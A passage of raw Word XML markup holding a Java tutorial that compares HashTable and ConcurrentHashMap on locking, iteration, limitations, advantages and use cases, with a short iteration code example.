          <w:p w14:paraId="32AA125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lower (entire map locked)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="418F550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ster (only bucket locked)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="26CCD75B" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53B4316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Read Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42D8D19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ynchronized (even for reading)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12ECF05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n-blocking read operations (no locking required)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="63F156FB" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B6E75C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Write Operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77AA3F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Locks entire map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59426A3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Locks only the </w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>specific bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CA2D252"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Why ConcurrentHashMap is Faster:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6B664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Allows </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent reads</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FD7D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fine-grained locking</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, so multiple threads can write to </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>different buckets</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the same time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2847F40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Eliminates the </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global lock bottleneck</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of HashTable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6873D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pict w14:anchorId="2B4FD06D">
          <v:rect id="_x0000_i7350" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="213223F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4. Iteration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983"/>
        <w:gridCol w:w="4137"/>
      </w:tblGrid>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="0ECFE6B2" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B9B124D"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2719DDB4"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265B120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7D36E059" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58D2051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Iterator Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C19452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Fail-fast (throws ConcurrentModificationException)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="407FADA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Weakly consistent (no exception during concurrent modification)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="68A8EEB8" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D49A50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afe for Iteration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D4BD5C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 (modification while iterating causes exception)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="715518E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Yes (reflects changes made during iteration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="37DD6E12" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33DAE77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Modification During Iteration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FEF1CF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Not allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4337344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Allowed (might not reflect the most recent changes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44D4800E"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Example: Concurrent Iteration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274178EC"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put("Z", 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C8B56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forEach((k, v) -&gt; System.out.println(k + ": " + v));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE4D93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ncurrentMap.put("W", 40);  // Can add while iterating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196DB27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pict w14:anchorId="2FFBB519">
          <v:rect id="_x0000_i7351" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2063CAB5"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lastRenderedPageBreak/>
        <w:t>5. Limitations of HashTable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F644EE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global synchronization</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, causing performance bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3634DDBF"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Not suitable for </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly concurrent environments</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252BC7B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efficient when the </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>number of threads increases</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B98D34E"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pict w14:anchorId="665F4F34">
          <v:rect id="_x0000_i7352" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF106E"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6. Advantages of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6372"/>
      </w:tblGrid>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="4C1670DF" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E563588"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Advantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C509FF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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="39186225" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13F4EB3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igh Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35EF518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Multiple threads can read/write simultaneously.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="0597040C" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7779E9B3"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Better Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B07641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lock striping</w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to reduce lock contention.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="6F438602" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D82FD5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Weak Consistency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="753E39F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Does not fail during concurrent modification, providing </w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>better uptime</w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="06DAEB1D" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C78F88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Non-Blocking Reads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17E3525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s </w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>volatile</w:t>
            </w:r>
            <w:r w:rsidRPr="005420DA">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> variables for read operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="373F85B4" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="177A75A7"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Safe for Multi-Threaded Iteration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5000516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Iterates safely even if the map is concurrently modified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1AF9277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pict w14:anchorId="716E76E6">
          <v:rect id="_x0000_i7353" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="636B578B"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7.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3756"/>
        <w:gridCol w:w="3993"/>
      </w:tblGrid>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="10E5109B" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="280A5780"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FCB817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HashTable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D32CCBC"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ConcurrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="2AFC65EE" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EBAC8A6"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ow-Concurrency Applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EB066F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Suitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7069EED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Overkill</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="3C8007F3" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FDF1B6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igh-Concurrency Applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D2A0965"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oor performance due to global lock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70B72129"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Preferred due to segmented locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005420DA" w:rsidRPr="005420DA" w14:paraId="379B38BC" w14:textId="77777777" w:rsidTr="005420DA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16BDB80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Legacy Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="074A2B6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Commonly used before Java Collections framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="436FEB1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Modern approach for multi-threaded environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58DC5A8A"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pict w14:anchorId="35D43CCF">
          <v:rect id="_x0000_i7354" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="188A3C99"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8. Why Prefer ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43729B"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In modern multi-threaded applications, ConcurrentHashMap is </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>vastly superior</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to HashTable due to its </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fine-grained locking</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking reads</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890608D"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HashTable</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is largely considered </w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>obsolete</w:t>
      </w:r>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and in most cases, ConcurrentHashMap should be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D4DC90"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pict w14:anchorId="2A2D905E">
          <v:rect id="_x0000_i7355" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="421E43E6" w14:textId="77777777" w:rsidR="005420DA" w:rsidRPr="005420DA" w:rsidRDefault="005420DA" w:rsidP="005420DA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005420DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1FA241"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 </w:t>
      </w:r>
